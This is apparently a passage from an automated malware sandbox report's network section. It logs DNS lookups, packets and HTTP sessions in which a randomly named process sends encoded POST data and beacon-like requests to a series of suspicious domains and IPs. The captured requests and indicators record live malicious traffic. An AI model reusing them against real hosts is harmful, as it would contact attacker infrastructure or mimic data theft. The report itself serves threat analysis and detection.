                                                                        Dec 13, 2024 13:10:24.910090923 CET8050045161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:26.132560968 CET8050045161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:26.132584095 CET8050045161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:26.132594109 CET8050045161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:26.132643938 CET8050045161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:26.132785082 CET5004580192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:26.132785082 CET5004580192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:26.139923096 CET5004580192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:10:26.259874105 CET8050045161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:10:46.893759966 CET5005080192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:10:47.014014006 CET80500503.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:10:47.014106989 CET5005080192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:10:47.026427984 CET5005080192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:10:47.146310091 CET80500503.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:10:48.112895966 CET80500503.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:10:48.112945080 CET80500503.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:10:48.113014936 CET5005080192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:10:48.529366016 CET5005080192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:10:49.547647953 CET5005180192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:10:49.667515039 CET80500513.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:10:49.667680979 CET5005180192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:10:49.679757118 CET5005180192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:10:49.799552917 CET80500513.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:10:50.763427973 CET80500513.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:10:50.763453960 CET80500513.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:10:50.763552904 CET5005180192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:10:51.185239077 CET5005180192.168.2.43.33.130.190

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 13, 2024 13:06:46.087924004 CET6334553192.168.2.41.1.1.1
                                                                        Dec 13, 2024 13:06:47.075742960 CET6334553192.168.2.41.1.1.1
                                                                        Dec 13, 2024 13:06:47.216994047 CET53633451.1.1.1192.168.2.4
                                                                        Dec 13, 2024 13:06:47.217004061 CET53633451.1.1.1192.168.2.4
                                                                        Dec 13, 2024 13:07:03.854353905 CET5084753192.168.2.41.1.1.1
                                                                        Dec 13, 2024 13:07:04.227193117 CET53508471.1.1.1192.168.2.4
                                                                        Dec 13, 2024 13:07:18.594589949 CET5192453192.168.2.41.1.1.1
                                                                        Dec 13, 2024 13:07:19.098153114 CET53519241.1.1.1192.168.2.4
                                                                        Dec 13, 2024 13:07:33.579222918 CET5697353192.168.2.41.1.1.1
                                                                        Dec 13, 2024 13:07:33.973871946 CET53569731.1.1.1192.168.2.4
                                                                        Dec 13, 2024 13:08:33.486896992 CET5070253192.168.2.41.1.1.1
                                                                        Dec 13, 2024 13:08:33.803704977 CET53507021.1.1.1192.168.2.4
                                                                        Dec 13, 2024 13:08:48.784070969 CET5380453192.168.2.41.1.1.1
                                                                        Dec 13, 2024 13:08:49.477361917 CET53538041.1.1.1192.168.2.4
                                                                        Dec 13, 2024 13:09:03.707334995 CET6384153192.168.2.41.1.1.1
                                                                        Dec 13, 2024 13:09:04.076507092 CET53638411.1.1.1192.168.2.4
                                                                        Dec 13, 2024 13:09:21.299566031 CET5305353192.168.2.41.1.1.1
                                                                        Dec 13, 2024 13:09:22.138940096 CET53530531.1.1.1192.168.2.4
                                                                        Dec 13, 2024 13:09:36.583359957 CET6247353192.168.2.41.1.1.1
                                                                        Dec 13, 2024 13:09:37.018965960 CET53624731.1.1.1192.168.2.4
                                                                        Dec 13, 2024 13:09:45.080786943 CET5380553192.168.2.41.1.1.1
                                                                        Dec 13, 2024 13:09:45.532730103 CET53538051.1.1.1192.168.2.4
                                                                        Dec 13, 2024 13:10:00.011334896 CET6106953192.168.2.41.1.1.1
                                                                        Dec 13, 2024 13:10:00.713052988 CET53610691.1.1.1192.168.2.4
                                                                        Dec 13, 2024 13:10:15.118319988 CET5628753192.168.2.41.1.1.1
                                                                        Dec 13, 2024 13:10:15.645673037 CET53562871.1.1.1192.168.2.4
                                                                        Dec 13, 2024 13:10:31.142157078 CET5947753192.168.2.41.1.1.1
                                                                        Dec 13, 2024 13:10:31.472239971 CET53594771.1.1.1192.168.2.4
                                                                        Dec 13, 2024 13:10:46.235894918 CET5275653192.168.2.41.1.1.1
                                                                        Dec 13, 2024 13:10:46.891304970 CET53527561.1.1.1192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Dec 13, 2024 13:06:46.087924004 CET192.168.2.41.1.1.10x5fa1Standard query (0)www.idsmart.onlineA (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:06:47.075742960 CET192.168.2.41.1.1.10x5fa1Standard query (0)www.idsmart.onlineA (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:07:03.854353905 CET192.168.2.41.1.1.10xf50Standard query (0)www.sortcouponspot.shopA (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:07:18.594589949 CET192.168.2.41.1.1.10x4afStandard query (0)www.030002128.xyzA (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:07:33.579222918 CET192.168.2.41.1.1.10x8024Standard query (0)www.quicktraze.websiteA (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:08:33.486896992 CET192.168.2.41.1.1.10x3257Standard query (0)www.tenmyk.shopA (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:08:48.784070969 CET192.168.2.41.1.1.10x9607Standard query (0)www.tlcatlas.xyzA (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:09:03.707334995 CET192.168.2.41.1.1.10xe1b6Standard query (0)www.xphone.netA (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:09:21.299566031 CET192.168.2.41.1.1.10xaa84Standard query (0)www.basicreviews.onlineA (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:09:36.583359957 CET192.168.2.41.1.1.10x1bdeStandard query (0)www.89180.appA (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:09:45.080786943 CET192.168.2.41.1.1.10x680dStandard query (0)www.stationseek.onlineA (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:10:00.011334896 CET192.168.2.41.1.1.10x1993Standard query (0)www.solarand.onlineA (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:10:15.118319988 CET192.168.2.41.1.1.10xbf42Standard query (0)www.030002059.xyzA (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:10:31.142157078 CET192.168.2.41.1.1.10x8fdbStandard query (0)www.salju777-rtp.clickA (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:10:46.235894918 CET192.168.2.41.1.1.10x61dStandard query (0)www.tdassetmgt.infoA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Dec 13, 2024 13:06:47.216994047 CET1.1.1.1192.168.2.40x5fa1No error (0)www.idsmart.online15.204.67.7A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:06:47.217004061 CET1.1.1.1192.168.2.40x5fa1No error (0)www.idsmart.online15.204.67.7A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:07:04.227193117 CET1.1.1.1192.168.2.40xf50No error (0)www.sortcouponspot.shop172.67.158.234A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:07:04.227193117 CET1.1.1.1192.168.2.40xf50No error (0)www.sortcouponspot.shop104.21.90.177A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:07:19.098153114 CET1.1.1.1192.168.2.40x4afNo error (0)www.030002128.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:07:33.973871946 CET1.1.1.1192.168.2.40x8024No error (0)www.quicktraze.website209.74.64.58A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:08:33.803704977 CET1.1.1.1192.168.2.40x3257No error (0)www.tenmyk.shop104.21.74.79A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:08:33.803704977 CET1.1.1.1192.168.2.40x3257No error (0)www.tenmyk.shop172.67.200.118A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:08:49.477361917 CET1.1.1.1192.168.2.40x9607No error (0)www.tlcatlas.xyztlcatlas.xyzCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 13, 2024 13:08:49.477361917 CET1.1.1.1192.168.2.40x9607No error (0)tlcatlas.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:08:49.477361917 CET1.1.1.1192.168.2.40x9607No error (0)tlcatlas.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:09:04.076507092 CET1.1.1.1192.168.2.40xe1b6No error (0)www.xphone.net13.248.169.48A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:09:04.076507092 CET1.1.1.1192.168.2.40xe1b6No error (0)www.xphone.net76.223.54.146A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:09:22.138940096 CET1.1.1.1192.168.2.40xaa84No error (0)www.basicreviews.onlinebasicreviews.onlineCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 13, 2024 13:09:22.138940096 CET1.1.1.1192.168.2.40xaa84No error (0)basicreviews.online144.76.190.39A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:09:37.018965960 CET1.1.1.1192.168.2.40x1bdeServer failure (2)www.89180.appnonenoneA (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:09:45.532730103 CET1.1.1.1192.168.2.40x680dNo error (0)www.stationseek.onlinestationseek.onlineCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 13, 2024 13:09:45.532730103 CET1.1.1.1192.168.2.40x680dNo error (0)stationseek.online198.251.84.200A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:10:00.713052988 CET1.1.1.1192.168.2.40x1993No error (0)www.solarand.onlinesolarand.onlineCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 13, 2024 13:10:00.713052988 CET1.1.1.1192.168.2.40x1993No error (0)solarand.online217.160.0.60A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:10:15.645673037 CET1.1.1.1192.168.2.40xbf42No error (0)www.030002059.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:10:31.472239971 CET1.1.1.1192.168.2.40x8fdbNo error (0)www.salju777-rtp.click172.67.149.64A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:10:31.472239971 CET1.1.1.1192.168.2.40x8fdbNo error (0)www.salju777-rtp.click104.21.29.140A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:10:46.891304970 CET1.1.1.1192.168.2.40x61dNo error (0)www.tdassetmgt.infotdassetmgt.infoCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 13, 2024 13:10:46.891304970 CET1.1.1.1192.168.2.40x61dNo error (0)tdassetmgt.info3.33.130.190A (IP address)IN (0x0001)false
                                                                        Dec 13, 2024 13:10:46.891304970 CET1.1.1.1192.168.2.40x61dNo error (0)tdassetmgt.info15.197.148.33A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • www.idsmart.online
                                                                        • www.sortcouponspot.shop
                                                                        • www.030002128.xyz
                                                                        • www.quicktraze.website
                                                                        • 45.200.148.45
                                                                        • www.tenmyk.shop
                                                                        • www.tlcatlas.xyz
                                                                        • www.xphone.net
                                                                        • www.basicreviews.online
                                                                        • www.stationseek.online
                                                                        • www.solarand.online
                                                                        • www.030002059.xyz
                                                                        • www.tdassetmgt.info

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.44973615.204.67.7805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:06:47.357765913 CET513OUTGET /jbgy/?9B_ppt=WpM+dDwUrs4Ykb5b1dnjbOfiyH7DQBbUygihNlQvbeZsifJZmgd82eWBWlqYoXZ4M0nFDUKlc8dkNQUv++NgzJUq6TxFRvYz6U7LgU8Svc64lC0D7BgxK28=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
                                                                        Host: www.idsmart.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Dec 13, 2024 13:06:48.766279936 CET1236INHTTP/1.1 200 OK
                                                                        date: Fri, 13 Dec 2024 12:06:48 GMT
                                                                        server: Apache
                                                                        set-cookie: __tad=1734091608.7578817; expires=Mon, 11-Dec-2034 12:06:48 GMT; Max-Age=315360000
                                                                        vary: Accept-Encoding
                                                                        content-length: 1512
                                                                        content-type: text/html; charset=UTF-8
                                                                        connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 69 64 73 6d 61 72 74 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 69 64 73 6d 61 72 74 2e 6f 6e 6c 69 6e 65 2f 6a 62 67 79 2f 3f 39 42 5f 70 70 74 3d 57 70 4d 2b 64 44 77 55 72 73 34 59 6b 62 35 62 31 64 6e 6a 62 4f 66 69 79 48 37 44 51 42 62 55 79 67 69 68 4e 6c 51 76 62 65 5a 73 69 66 4a 5a 6d 67 64 38 32 65 57 42 57 6c 71 59 6f 58 5a 34 4d 30 6e 46 44 55 4b 6c 63 38 64 6b 4e 51 55 76 2b 2b 4e 67 7a 4a 55 71 36 54 78 46 52 76 59 7a 36 55 37 4c 67 55 38 53 76 63 36 34 6c 43 30 44 37 42 67 78 4b 32 38 3d 26 53 62 76 38 49 3d [TRUNCATED]
                                                                        Data Ascii: <html><head><title>idsmart.online</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.idsmart.online/jbgy/?9B_ppt=WpM+dDwUrs4Ykb5b1dnjbOfiyH7DQBbUygihNlQvbeZsifJZmgd82eWBWlqYoXZ4M0nFDUKlc8dkNQUv++NgzJUq6TxFRvYz6U7LgU8Svc64lC0D7BgxK28=&Sbv8I=RfPDYvIHtJXp8&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor
                                                                        Dec 13, 2024 13:06:48.766361952 CET548INData Raw: 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 69 64 73 6d 61 72 74
                                                                        Data Ascii: ="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.idsmart.online/jbgy/?9B_ppt=WpM+dDwUrs4Ykb5b1dnjbOfiyH7DQBbUygihNlQvbeZsifJZmgd82eWBWlqYoXZ4M0nFDUKlc8dkNQUv++NgzJUq6TxFRvYz6U7LgU8Svc64lC0D7BgxK28=&Sbv8I=RfPDYvIHtJXp8


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.449737172.67.158.234805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:07:04.360903025 CET788OUTPOST /90oi/ HTTP/1.1
                                                                        Host: www.sortcouponspot.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.sortcouponspot.shop
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.sortcouponspot.shop/90oi/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 62 66 75 52 74 77 54 74 50 53 7a 46 71 48 50 68 4c 70 57 6c 65 54 64 51 4f 5a 6a 43 57 34 42 4f 49 78 39 4f 63 52 73 63 6a 35 61 63 36 69 4c 33 4a 32 49 58 4e 51 59 51 53 4b 73 69 72 68 54 31 42 37 57 44 32 4f 5a 42 78 38 72 6e 49 46 4a 74 6d 78 31 38 57 6d 6e 32 75 78 76 71 6f 4f 4c 49 30 45 5a 72 36 48 36 5a 47 62 6b 61 64 51 44 4c 7a 5a 71 69 56 4c 78 4e 66 39 4a 75 74 43 6a 4f 6f 50 30 72 75 74 48 32 57 7a 4d 41 63 51 57 59 73 4a 79 34 58 47 69 74 76 7a 42 57 50 4e 51 54 57 64 56 34 78 7a 6e 63 33 76 30 30 58 54 68 32 6c 4d 79 4b 36 55 70 71 30 50 35 59 62 53 6d 6b 30 77 3d 3d
                                                                        Data Ascii: 9B_ppt=bfuRtwTtPSzFqHPhLpWleTdQOZjCW4BOIx9OcRscj5ac6iL3J2IXNQYQSKsirhT1B7WD2OZBx8rnIFJtmx18Wmn2uxvqoOLI0EZr6H6ZGbkadQDLzZqiVLxNf9JutCjOoP0rutH2WzMAcQWYsJy4XGitvzBWPNQTWdV4xznc3v00XTh2lMyK6Upq0P5YbSmk0w==
                                                                        Dec 13, 2024 13:07:05.529803991 CET1236INHTTP/1.1 429
                                                                        Date: Fri, 13 Dec 2024 12:07:05 GMT
                                                                        Content-Type: text/html;charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mx4h9vjU5Sr1j1uckUPPiQUZL2cEZg%2FzP9MS%2BnL2TypysYjC10H2vaoaCoQjD15zH%2Bn1MS1mvb2frSK2sGVHnntV4FDTkTf51eBBWhNJQMB04KMhMMKAbdWwddx478aXFDFWFAwUivY5Gg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f15d4f1faf64301-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1576&rtt_var=788&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=788&delivery_rate=0&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 34 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 31 35 64 34 66 31 66 61 66 36 34 33 30 31 27 2c 74 3a 27 4d 54 63 7a 4e 44 [TRUNCATED]
                                                                        Data Ascii: 44b<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8f15d4f1faf64301',t:'MTczNDA5MTYyNS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scrip
                                                                        Dec 13, 2024 13:07:05.529853106 CET662INData Raw: 74 73 2f 6a 73 64 2f 6d 61 69 6e 2e 6a 73 27 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 22 3b 62 2e 67 65 74 45 6c 65
                                                                        Data Ascii: ts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.449738172.67.158.234805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:07:07.034020901 CET808OUTPOST /90oi/ HTTP/1.1
                                                                        Host: www.sortcouponspot.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.sortcouponspot.shop
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.sortcouponspot.shop/90oi/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 62 66 75 52 74 77 54 74 50 53 7a 46 6f 6b 58 68 49 4f 4b 6c 57 54 64 52 4c 5a 6a 43 44 49 42 56 49 78 68 4f 63 54 41 79 6a 4c 2b 63 39 44 37 33 4b 7a 38 58 4f 51 59 51 4b 36 73 6a 6f 52 53 59 42 37 61 4c 32 4d 4e 42 78 38 2f 6e 49 42 4e 74 6e 42 4a 2f 57 32 6e 77 68 52 76 73 77 75 4c 49 30 45 5a 72 36 48 66 4d 47 62 38 61 64 6a 62 4c 7a 38 47 6a 59 72 78 4f 59 39 4a 75 36 53 6a 53 6f 50 30 4a 75 6f 6e 51 57 32 41 41 63 52 6d 59 72 64 65 35 65 47 6a 6f 77 6a 41 4b 46 76 49 44 54 59 73 6d 37 79 4c 6f 30 73 42 54 57 56 73 73 30 39 54 64 6f 55 4e 5a 70 49 77 73 57 52 62 74 76 79 34 54 52 70 47 66 44 39 6d 4d 6c 75 77 79 4c 33 2b 32 2f 58 41 3d
                                                                        Data Ascii: 9B_ppt=bfuRtwTtPSzFokXhIOKlWTdRLZjCDIBVIxhOcTAyjL+c9D73Kz8XOQYQK6sjoRSYB7aL2MNBx8/nIBNtnBJ/W2nwhRvswuLI0EZr6HfMGb8adjbLz8GjYrxOY9Ju6SjSoP0JuonQW2AAcRmYrde5eGjowjAKFvIDTYsm7yLo0sBTWVss09TdoUNZpIwsWRbtvy4TRpGfD9mMluwyL3+2/XA=
                                                                        Dec 13, 2024 13:07:08.252403975 CET1236INHTTP/1.1 429
                                                                        Date: Fri, 13 Dec 2024 12:07:08 GMT
                                                                        Content-Type: text/html;charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bFCN1DiW6CfBfm8g23dxAp7q3NC16K0ClwgiyYFQKesYaFFOvo7mYpvZs6U71YQ1mIdP2f2CLSQxYFcDbibvjdBxNcr09KKZfWXVlcgkeeE6ZGX%2B3lliK47Q37jalFYr%2Fe0nkqZFth%2BEFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f15d502e8f34259-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1571&rtt_var=785&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=808&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 34 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 31 35 64 35 30 32 65 38 66 33 34 32 35 39 27 2c 74 3a 27 4d 54 63 7a 4e 44 [TRUNCATED]
                                                                        Data Ascii: 44b<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8f15d502e8f34259',t:'MTczNDA5MTYyOC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scrip
